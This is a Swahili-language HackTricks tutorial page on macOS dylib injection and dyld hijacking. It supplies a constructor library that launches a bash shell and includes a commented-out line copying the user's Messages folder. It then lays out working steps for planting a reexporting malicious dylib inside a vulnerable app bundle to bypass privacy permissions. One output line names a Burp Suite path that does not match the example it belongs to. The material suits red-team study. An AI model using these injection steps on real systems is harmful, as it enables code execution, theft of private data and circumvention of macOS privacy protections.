Swahili - Ht
HackTricks Training Twitter Linkedin Sponsor

macOS Dyld Hijacking & DYLD_INSERT_LIBRARIES

Jifunze kuhusu kudukua AWS kutoka mwanzo hadi kuwa shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

DYLD_INSERT_LIBRARIES Mfano wa Msingi

Mfano wa msingi wa maktaba ya kuingiza kutekeleza kifaa cha shell:

// gcc -dynamiclib -o inject.dylib inject.c

#include <syslog.h>
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
__attribute__((constructor))

void myconstructor(int argc, const char **argv)
{
syslog(LOG_ERR, "[+] dylib injected in %s\n", argv[0]);
printf("[+] dylib injected in %s\n", argv[0]);
execv("/bin/bash", 0);
//system("cp -r ~/Library/Messages/ /tmp/Messages/");
}

Binaryi la kushambulia:

// gcc hello.c -o hello
#include <stdio.h>

int main()
{
printf("Hello, World!\n");
return 0;
}

Uingizaji:

DYLD_INSERT_LIBRARIES=inject.dylib ./hello

Mfano wa Udukuzi wa Dyld Hijacking

Binary iliyolengwa na udhaifu ni /Applications/VulnDyld.app/Contents/Resources/lib/binary.

codesign -dv --entitlements :- "/Applications/VulnDyld.app/Contents/Resources/lib/binary"
[...]com.apple.security.cs.disable-library-validation[...]

Kutokana na taarifa tulizopata hapo awali tunajua kwamba haikagua saini ya maktaba zilizopakiwa na inajaribu kupakia maktaba kutoka:

  • /Applications/VulnDyld.app/Contents/Resources/lib/lib.dylib

  • /Applications/VulnDyld.app/Contents/Resources/lib2/lib.dylib

Hata hivyo, ya kwanza haipo:

pwd
/Applications/VulnDyld.app

find ./ -name lib.dylib
./Contents/Resources/lib2/lib.dylib

Kwa hivyo, ni rahisi kuiteka! Unda maktaba ambayo inatekeleza nambari isiyo ya kawaida na kuuza nje kazi sawa kama maktaba halali kwa kuiuza nje. Na kumbuka kuichakata na toleo lililotarajiwa:

lib.m
#import <Foundation/Foundation.h>

__attribute__((constructor))
void custom(int argc, const char **argv) {
NSLog(@"[+] dylib hijacked in %s", argv[0]);
}

Kuikusanya:

gcc -dynamiclib -current_version 1.0 -compatibility_version 1.0 -framework Foundation /tmp/lib.m -Wl,-reexport_library,"/Applications/VulnDyld.app/Contents/Resources/lib2/lib.dylib" -o "/tmp/lib.dylib"
# Note the versions and the reexport

Njia ya reexport iliyoundwa kwenye maktaba ni ya kulinganisha na mzigo, tugeuze iwe njia kamili kwa maktaba ya kuuza:

#Check relative
otool -l /tmp/lib.dylib| grep REEXPORT -A 2
cmd LC_REEXPORT_DYLIB
cmdsize 48
name @rpath/libjli.dylib (offset 24)

#Change the location of the library absolute to absolute path
install_name_tool -change @rpath/lib.dylib "/Applications/VulnDyld.app/Contents/Resources/lib2/lib.dylib" /tmp/lib.dylib

# Check again
otool -l /tmp/lib.dylib| grep REEXPORT -A 2
cmd LC_REEXPORT_DYLIB
cmdsize 128
name /Applications/Burp Suite Professional.app/Contents/Resources/jre.bundle/Contents/Home/lib/libjli.dylib (offset 24)

Hatimaye tu nakili kwenye eneo lililoporwa:

cp lib.dylib "/Applications/VulnDyld.app/Contents/Resources/lib/lib.dylib"

Na tekeleza binary na angalia ikiwa maktaba imepakia:

"/Applications/VulnDyld.app/Contents/Resources/lib/binary"
2023-05-15 15:20:36.677 binary[78809:21797902] [+] dylib imehijacked katika /Applications/VulnDyld.app/Contents/Resources/lib/binary
Matumizi: [...]

Maelezo mazuri kuhusu jinsi ya kutumia udhaifu huu kudanganya ruhusa za kamera za telegram zinaweza kupatikana kwenye https://danrevah.github.io/2023/05/15/CVE-2023-26818-Bypass-TCC-with-Telegram/

Kiwango Kubwa

Ikiwa unapanga kujaribu kuingiza maktaba kwenye binaries ambazo hazikutazamiwa, unaweza kuangalia ujumbe wa matukio ili kujua lini maktaba inapakia ndani ya mchakato (katika kesi hii ondoa printf na utekelezaji wa /bin/bash).

sudo log stream --style syslog --predicate 'eventMessage CONTAINS[c] "[+] dylib"'
Jifunze AWS hacking kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

PreviousmacOS Library InjectionNextmacOS Dyld Process

Last updated